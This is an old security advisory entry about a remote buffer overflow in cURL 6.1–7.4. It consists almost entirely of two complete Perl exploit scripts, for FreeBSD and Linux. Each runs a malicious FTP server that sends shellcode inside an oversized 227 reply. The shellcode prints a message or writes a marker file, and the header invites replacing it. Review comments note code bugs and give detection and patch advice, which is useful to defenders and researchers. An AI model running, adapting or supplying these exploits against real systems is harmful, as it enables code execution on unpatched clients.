7th May 2002 [SBWID-5332]
COMMAND
cURL remote buffer overflow exploits
SYSTEMS AFFECTED
cURL v 6.1 - 7.4
PROBLEM
'KF' [http://www.snosoft.com/research/] posted:
--FreeBSD Exploit --
--------------010208070202030806020806
Content-Type: text/plain;
name="cURL-remote-FBSD.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="cURL-remote-FBSD.pl"
#!/usr/bin/perl
#
# Remote FreeBSD cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
#
# This exploit may only be used for testing purposes. More information
# about the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write \"Ha! Owned by a cURL!\" to stdout on the system
# running cURL. The extra nops are needed because the buffer, which causes
# the overflow, is altered.
#
# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
# Ha! Owned by a cURL!
use IO::Socket;
use Net::hostent;
########################################################################
# Payload that the fake FTP server places in its "227" reply (the
# header comment above names the affected range, cURL 6.1 - 7.4, and
# BID 1804). The trailing run of \x90 bytes is the extra padding the
# header says is needed because the overflowed buffer is altered.
$shellcode =
\"\\xeb\\x14\\x5e\\x31\\xc0\\x6a\\x14\\x56\\x40\\x40\\x50\\xb0\\x04\\x50\\xcd\".
\"\\x80\\x31\\xc0\\x40\\x50\\xcd\\x80\\xe8\\xe7\\xff\\xff\\xff\\x48\\x61\\x21\".
\"\\x20\\x4f\\x77\\x6e\\x65\\x64\\x20\\x62\\x79\\x20\\x61\\x20\\x63\\x55\\x52\".
\"\\x4c\\x21\\x23\".
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";
# Option parsing: keep consuming while the first argument starts with '-'.
#   -p <port>    port to listen on (defaults to 21 below)
#   -l           required; without it only the usage text is printed
#   -o <offset>  value added to $esp when the return address is packed
# A bare '--' ends option processing. Note that an offset of 0 is
# indistinguishable from "not given" because of the 'unless $offset' below.
while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}
# Effective uid via the external 'id' command; chop removes the newline.
$id = `id -u`; chop($id);
# $size is the total length of the reply body built below; $esp and
# $offset together form the 4 bytes appended at its end.
$size = 225;
$esp = 0xbfbffbd4;
$offset = -140 unless $offset;
$port = 21 unless $port;
# '&&' binds tighter than '||', so this reads !$list || ($port > 1024 && $id != 0):
# the usage text is printed when -l is missing, or when a non-root user
# asked for a port ABOVE 1024. That is not what the "low ports require
# root" note in the usage text describes; a failed bind on a low port is
# instead reported by the 'die' after socket creation.
if(!$list || $port > 1024 && $id != 0) {
print <<\"TWENTE\";
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
Usage : $0 -l
Option: $0 -p <port to listen on>
Option: $0 -o <offset>
Note: low ports require root privileges
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
TWENTE
exit;
}
# Reply body: \x90 padding, then $shellcode, then a 4-byte native-endian
# signed long ('l'), for exactly $size bytes in total.
for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
$buffer .= \"\\x90\";
}
$buffer .= $shellcode;
$buffer .= pack(\'l\', ($esp + $offset));
# NOTE(review): this logs $esp - $offset, but the value packed into
# $buffer above is $esp + $offset, so the printed address does not match
# what is actually sent.
print(\"We are using return address: 0x\", sprintf(\'%lx\',($esp - $offset)), \"\\n\");
print \"Starting to listen for incomming connections on port $port\\n\";
# Listening socket. 'new IO::Socket::INET (...)' is indirect-object
# syntax; IO::Socket::INET->new(...) is the unambiguous spelling.
my $sock = new IO::Socket::INET (
LocalPort => $port,
Proto => \'tcp\',
Listen => 1,
Reuse => 1,
);
die \"Could not create socket: $!\\n\" unless $sock;
# One canned FTP dialogue per client: ordinary 220 greeting and 230
# login reply, then a 227 line whose body is $buffer. For defenders: a
# 227 reply of this length carrying binary data is nothing like the
# RFC 959 "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" shape, which
# makes it straightforward to flag on the wire; the remedy on the client
# side is a cURL release outside the affected 6.1 - 7.4 range.
while($cl = $sock->accept()) {
# Net::hostent's gethostbyaddr returns an object on success; the
# result is assigned but never used here -- peerhost is printed instead.
$hostinfo = gethostbyaddr($cl->peeraddr);
printf \"[Received connect from %s]\\n\", $cl->peerhost;
print $cl \"220 Safemode.org FTP server (Version 666) ready.\\n\";
print $cl \"230 Ok\\n\";
print $cl \"227 $buffer\\n\";
# Give the client time to read the reply; the connection is closed when
# $cl is reassigned by the next accept().
sleep 2;
}
--------------010208070202030806020806--
--Linux Exploit --
--------------030109090800050503000809
Content-Type: text/plain;
name="cURL-remote-LNX.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="cURL-remote-LNX.pl"
#!/usr/bin/perl
#
# Remote linux cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://safemode.org && http://www.snosoft.com)
#
# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,
# may only be used for testing purposes. Additionally, the author does not
# take any responsibility for abuse of this file. More information about
# the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write \"Owned by a cURL ;)\" to the file /tmp/0wned.txt
# You can replace it with whatever you want but be warned: due to buffer
# manipulation working shellcode might be altered.
#
# A FreeBSD version is also available on safemode.org
use IO::Socket;
use Net::hostent;
# Payload that the fake FTP server places in its "227" reply (the
# header comment above names the affected range, cURL 6.1 - 7.4, and
# BID 1804, and says this variant writes a marker file under /tmp).
$shellcode = # does a open() write() close() and exit().
\"\\xeb\\x40\\x5e\\x31\\xc0\\x88\\x46\\x0e\\xc6\\x46\\x21\\x09\\xfe\\x46\\x21\".
\"\\x88\\x46\\x22\\x8d\\x5e\\x0f\\x89\\x5e\\x23\\xb0\\x05\\x8d\\x1e\\x66\\xb9\".
\"\\x42\\x04\\x66\\xba\\xe4\\x01\\xcd\\x80\\x89\\xc3\\xb0\\x04\\x8b\\x4e\\x23\".
\"\\x66\\xba\\x0f\\x27\\x66\\x81\\xea\\xfc\\x26\\xcd\\x80\\xb0\\x06\\xcd\\x80\".
\"\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xbb\\xff\\xff\\xff\\x2f\\x74\\x6d\\x70\".
\"\\x2f\\x30\\x77\\x6e\\x65\\x64\\x2e\\x74\\x78\\x74\\x23\\x30\\x77\\x6e\\x65\".
\"\\x64\\x20\\x62\\x79\\x20\\x61\\x20\\x63\\x55\\x52\\x4c\\x20\\x3b\\x29\";
# Option parsing: keep consuming while the first argument starts with '-'.
#   -p <port>    port to listen on (defaults to 21 below)
#   -l           required; without it only the usage text is printed
#   -o <offset>  value added to $esp when the return address is packed
# A bare '--' ends option processing. An offset of 0 is treated as
# "not given" because of the 'unless $offset' below.
while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}
# Effective uid via the external 'id' command; chop removes the newline.
$id = `id -u`; chop($id);
# $size is the total length of the reply body built below; $esp and
# $offset together form the 4 bytes appended at its end.
$size = 249;
$esp = 0xbffff810;
$offset = -150 unless $offset;
$port = 21 unless $port;
# '&&' binds tighter than '||', so this reads !$list || ($port > 1024 && $id != 0):
# the usage text is printed when -l is missing, or when a non-root user
# asked for a port ABOVE 1024 -- not what the "low ports require root"
# note describes. A failed bind on a low port is instead reported by the
# 'die' after socket creation.
if(!$list || $port > 1024 && $id != 0) {
print <<\"TWENTE\";
Usage : $0 -l
Option: $0 -p <port to listen on>
Option: $0 -o <offset>
Note: low ports require root privileges
TWENTE
exit;
}
# Reply body: \x90 padding, then $shellcode, then a 4-byte native-endian
# signed long ('l'), for exactly $size bytes in total. Interpolating
# $shellcode in double quotes is equivalent to appending it directly.
for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
$buffer .= \"\\x90\";
}
$buffer .= \"$shellcode\";
$buffer .= pack(\'l\', ($esp + $offset));
# NOTE(review): this logs $esp - $offset, but the value packed into
# $buffer above is $esp + $offset, so the printed address does not match
# what is actually sent.
print(\"Listening on port $port. We are using return address: 0x\", sprintf(\'%lx\',($esp - $offset)), \"\\n\");
# Listening socket. 'new IO::Socket::INET (...)' is indirect-object
# syntax; IO::Socket::INET->new(...) is the unambiguous spelling.
my $sock = new IO::Socket::INET (
LocalPort => $port,
Proto => \'tcp\',
Listen => 1,
Reuse => 1,
);
die \"Could not create socket: $!\\n\" unless $sock;
# One canned FTP dialogue per client: ordinary 220 greeting and 230
# login reply, then a 227 line whose body is $buffer. For defenders: a
# 227 reply of this length carrying binary data is nothing like the
# RFC 959 "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" shape, which
# makes it straightforward to flag on the wire; the remedy on the client
# side is a cURL release outside the affected 6.1 - 7.4 range.
while($cl = $sock->accept()) {
# Net::hostent's gethostbyaddr returns an object on success and undef
# when the reverse lookup fails. In the failure case the '->name' call
# on the next line dies ("Can't call method "name" on an undefined
# value") before any reply is written, ending the listener; the
# FreeBSD variant avoids this by printing peerhost only.
$hostinfo = gethostbyaddr($cl->peeraddr);
printf \"[Received connect from %s]\\n\", $hostinfo->name || $cl->peerhost;
print $cl \"220 Safemode.org FTP server (Version 666) ready.\\n\";
print $cl \"230 Ok\\n\";
print $cl \"227 $buffer\\n\";
# Give the client time to read the reply; the connection is closed when
# $cl is reassigned by the next accept().
sleep 2;
}
--------------030109090800050503000809--
SOLUTION
??